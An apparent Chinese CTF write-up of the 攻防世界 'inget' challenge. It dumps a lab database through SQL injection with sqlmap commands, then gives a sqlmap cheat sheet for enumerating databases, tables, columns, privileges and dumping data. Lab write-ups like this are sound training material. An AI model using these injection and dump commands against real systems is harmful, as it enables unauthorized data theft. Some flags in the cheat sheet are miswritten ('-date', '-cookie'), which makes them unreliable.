当前位置: 首页 > news >正文

攻防世界-宜兴网信办-inget

题目

访问题目路径

 这个题目的意思就是请输入ID,然后尝试绕过,那应该就是SQL注入,但是呢,我是个懒狗,我直接跑sqlmap

先跑数据库名

sqlmap "http://61.147.171.105:51322/?id=1" --current-db

爆表

sqlmap "http://61.147.171.105:51322/?id=1" -D cyber --tables

爆字段

sqlmap "http://61.147.171.105:51322/?id=1" -D cyber -T cyber --columns

 

爆数据

sqlmap "http://61.147.171.105:51322/?id=1" -D cyber -T cyber -C "pw" --dump

 

 sqlmap常用命令

注入检测方式:

get方式:sqlmap.py -u "URL"

post方式:sqlmap.py -u "URL" -date "post数据"

cookie方式:sqlmap.py -u "URL" -cookie "cookie数据"

获取数据库信息

获取数据库类型以及版本:sqlmap.py -u "URL"

获取网站使用的数据库名和用户名:sqlmap.py -u "URL" --current-db

                                                          sqlmap.py -u "URL" --current-user

获取数据量和用户权限

获取数据库的数据量:sqlmap.py -u "URL" --count -D "数据库名"

判断用户权限:sqlmap.py -u "URL" --privileges

Mysql注入

首先获取当前库名:sqlmap.py -u "URL" --current-db

其次获取库中表名:sqlmap.py -u "URL" --tables -D "数据库名"

然后获取库中某个表的列名:sqlmap.py -u "URL" --columns -T "表名" -D "库名"

最后获取库中某个表名的某个列名的字段内容:sqlmap.py -u "URL" --dump -C "列名" -T "表名" -D "库名"

相关文章:

  • 解决电脑C盘空间不足,发现微信和qq文件占用了大量内存
  • 青少年等级考试【Python通关干货】(一级)
  • android 9.0屏蔽短信功能(短信发送开关)
  • 【数据结构进阶】红黑树【TreeMap TreeSet底层就是红黑树】
  • 并发编程学习(四):wait()、nitify()
  • React基础知识(事件处理、受控组件与非受控组件、高阶函数、组件的生命周期)(三)
  • 制作嵌入式根文件系统
  • js获取某一时间到现在的总时间以及svg图标统一管理方法的封装
  • 编程艺术之变成原则
  • 高品质蓝牙耳机排行榜,值得入手的四款蓝牙耳机分享
  • 车载以太网 - 初识DoIP - 01
  • Java -- OSS对象存储服务(Object Storage Service,简称 OSS)文件服务器
  • 【云原生 | 48】Etcd集群管理
  • “0基础、学历无优势、逻辑能力一般……”能转行做程序员吗?
  • 【C++】多态(万字详解) —— 条件 | 虚函数重写 | 抽象类 | 多态的原理
  • Vue:从组件开始学习
  • Python find()、rfind()方法
  • Android -- 每日一问:如何实现自定义View?
  • 【模型推理加速系列】07: 以BERT为例全面评测各种推理加速方案
  • 【Python】Numpy中的Gumbel分布和Logistic分布